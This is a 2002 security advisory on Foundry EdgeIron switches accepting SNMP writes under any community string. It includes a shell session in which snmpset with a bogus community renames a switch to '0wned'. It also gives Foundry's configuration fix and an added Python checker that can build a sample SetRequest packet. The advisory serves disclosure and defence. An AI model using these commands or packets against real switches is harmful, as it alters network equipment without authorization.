21st Mar 2002 [SBWID-5200]
COMMAND
Foundry Networks EdgeIron SNMP opened R/W to **any** community name
SYSTEMS AFFECTED
Foundry Networks EdgeIron, current release as of 21 March 2002
PROBLEM
From advisory@prophecy.net.nz :
Default SNMP configuration allows SNMP requests to the switch with any
community string to have read and write access. All that is required is
IP access to the switch.
Example:
-------
[prophecy@loki ~]$ snmpget 10.1.1.120 public system.sysName
system.sysName.0 =
[prophecy@loki ~]$
[prophecy@loki ~]$ snmpset 10.1.1.120 totallyinvalidcommunitystring system.sysName s "0wned"
system.sysName.0 = 0wned
[prophecy@loki ~]$
I have tested this both before and AFTER deleting the default SNMP
communities from the switch. The default strings are: public (RO),
private (RW).
SOLUTION
It turns out that this is less a problem, and more a 'feature' of
these switches. The fix from Foundry is to issue the following
commands:
EdgeIron(config)#
EdgeIron(config)#snmp-server security
EdgeIron(config)#
EdgeIron(config)#snmp-server user <name> <community-string> <ip-address>
This then allows the specified IP to talk to the switch with that
community string. Requests from other IPs are ignored and the
'snmp-server security' option basically turns on the checking of
SNMPv1 community strings.
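
Added example (not part of the advisory, and not Foundry's code): a Python model of the check described above, for use on captured SNMP datagrams from a monitoring host. It reads the community string out of an SNMPv1 message and accepts it only if the (source IP, community) pair matches an entry of the kind configured with 'snmp-server user'. The function names, the community "n0c-rw" and the manager address 10.1.1.5 are assumptions made for the example.

```python
# Added example (not from the advisory). Function names are hypothetical.
PDU_TYPES = {0xA0: "get", 0xA1: "getnext", 0xA2: "response", 0xA3: "set"}

def _tlv(buf, pos):
    """Read one BER TLV at pos and return (tag, value, next_pos)."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:  # long-form length: low 7 bits give the byte count
        n = length & 0x7F
        if n == 0 or n > 4:
            raise ValueError("unsupported BER length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    if pos + length > len(buf):
        raise ValueError("truncated TLV")
    return tag, buf[pos:pos + length], pos + length

def parse_snmp_header(datagram):
    """Return (version, community, pdu_type) of an SNMPv1/v2c message."""
    tag, body, _ = _tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("message is not a SEQUENCE")
    tag, version, pos = _tlv(body, 0)
    if tag != 0x02:
        raise ValueError("version is not an INTEGER")
    tag, community, pos = _tlv(body, pos)
    if tag != 0x04:
        raise ValueError("community is not an OCTET STRING")
    pdu = PDU_TYPES.get(body[pos], hex(body[pos]))
    return int.from_bytes(version, "big"), community.decode("latin-1"), pdu

def is_allowed(src_ip, datagram, users):
    """users: set of (ip, community) pairs, one per 'snmp-server user' line."""
    try:
        _, community, _ = parse_snmp_header(datagram)
    except (ValueError, IndexError):
        return False  # fail closed on anything that does not parse
    return (src_ip, community) in users

def build_set(community, value):
    """Constructed sample input: SNMPv1 SetRequest for sysName.0."""
    def tlv(tag, val):
        return bytes([tag, len(val)]) + val
    oid = bytes.fromhex("2b06010201010500")  # 1.3.6.1.2.1.1.5.0
    binds = tlv(0x30, tlv(0x30, tlv(0x06, oid) + tlv(0x04, value)))
    zero = tlv(0x02, b"\x00")
    pdu = tlv(0xA3, tlv(0x02, b"\x01") + zero + zero + binds)
    return tlv(0x30, zero + tlv(0x04, community) + pdu)
```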